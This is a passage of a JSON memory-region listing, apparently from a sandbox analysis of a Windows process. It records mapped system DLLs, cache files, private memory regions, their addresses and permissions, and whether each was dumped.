"filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29442047, "entry_point": 29425664, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1642", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29425664, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29495295, "entry_point": 0, "filename": null, "id": "region_1643", "name": "pagefile_0x0000000001c20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29491200, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 30535679, "entry_point": 0, "filename": null, "id": "region_1644", "name": "pagefile_0x0000000001c40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29622272, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 30539776, "type": "region", 
"version": 1 }, "end_va": 30666751, "entry_point": 30539776, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1645", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 30539776, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001646-addr_0x0000000001d40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_285", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_1646", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:01:09.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31211519, "entry_point": 31195136, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1647", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 31195136, "timestamp": "00:01:09.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is 
not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 31981567, "entry_point": 31784960, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db", "id": "region_1648", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db", "region_type": "memory_mapped_file", "start_va": 31784960, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 32399359, "entry_point": 31981568, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1649", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 31981568, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001650-addr_0x0000000001f10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_1650", "name": "private_0x0000000001f10000", "norm_filename": 
null, "region_type": "private_memory", "start_va": 32571392, "timestamp": "00:01:09.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001651-addr_0x0000000002010000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 34144255, "entry_point": 0, "filename": null, "id": "region_1651", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 37089279, "entry_point": 34144256, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1652", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34144256, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 41234431, "entry_point": 0, "filename": null, "id": "region_1653", "name": "pagefile_0x0000000002360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37093376, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000010-region_00001654-addr_0x0000000002880000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1654", "name": "private_0x0000000002880000", "norm_filename": null, "region_type": "private_memory", "start_va": 42467328, "timestamp": "00:01:09.223", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001655-addr_0x0000000002960000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43384832, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 0, "filename": null, "id": "region_1655", "name": "private_0x0000000002960000", "norm_filename": null, "region_type": "private_memory", "start_va": 43384832, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791631921152, "type": "region", "version": 1 }, "end_va": 8791631970303, "entry_point": 8791631926144, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_1656", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791631921152, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791631986688, "type": "region", "version": 1 }, "end_va": 8791632199679, "entry_point": 8791631992976, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_1657", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791631986688, "timestamp": "00:01:09.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791659053056, "type": "region", "version": 1 }, "end_va": 8791659577343, "entry_point": 8791659072140, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_1658", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791659053056, "timestamp": "00:01:09.225", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791659577344, "type": "region", "version": 1 }, "end_va": 8791659638783, "entry_point": 8791659581504, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_1659", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:09.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 
8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1660", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:09.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1661", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:09.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": "region_1662", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:09.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": 
"\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1663", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:09.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1664", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:09.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1665", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:09.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 
8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1666", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:09.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1667", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:09.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1668", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:09.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1669", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": 
"memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:09.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1670", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:09.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1671", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:09.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1672", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:09.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1673", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:09.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1674", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:09.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001675-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1675", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001676-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], 
"info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1676", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001677-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1677", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001678-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1678", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:01:09.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], 
"info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1679", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:09.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1680", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:09.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1681", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:09.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", 
"permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32444415, "entry_point": 0, "filename": null, "id": "region_1682", "name": "pagefile_0x0000000001ef0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32440320, "timestamp": "00:01:09.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001683-addr_0x0000000001fe0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_1683", "name": "private_0x0000000001fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33423360, "timestamp": "00:01:09.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001684-addr_0x0000000002760000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 42336255, "entry_point": 0, "filename": null, "id": "region_1684", "name": "private_0x0000000002760000", "norm_filename": null, "region_type": "private_memory", "start_va": 41287680, "timestamp": "00:01:09.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001685-addr_0x0000000002b50000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { 
"ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_1685", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:01:09.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1686", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:09.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1687", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:09.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 
monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1688", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:09.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32518143, "entry_point": 0, "filename": null, "id": "region_1689", "name": "pagefile_0x0000000001f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32505856, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33099775, "entry_point": 0, "filename": null, "id": "region_1690", "name": "pagefile_0x0000000001f90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33095680, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001691-addr_0x0000000001fa0000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, 
"start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 0, "filename": null, "id": "region_1691", "name": "private_0x0000000001fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33161216, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001692-addr_0x0000000002a40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44302336, "type": "region", "version": 1 }, "end_va": 44826623, "entry_point": 0, "filename": null, "id": "region_1692", "name": "private_0x0000000002a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 44302336, "timestamp": "00:01:09.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 45940736, "type": "region", "version": 1 }, "end_va": 448593919, "entry_point": 0, "filename": null, "id": "region_1693", "name": "private_0x0000000002bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45940736, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001694-addr_0x000000001abd0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 448593920, "type": "region", "version": 1 }, "end_va": 
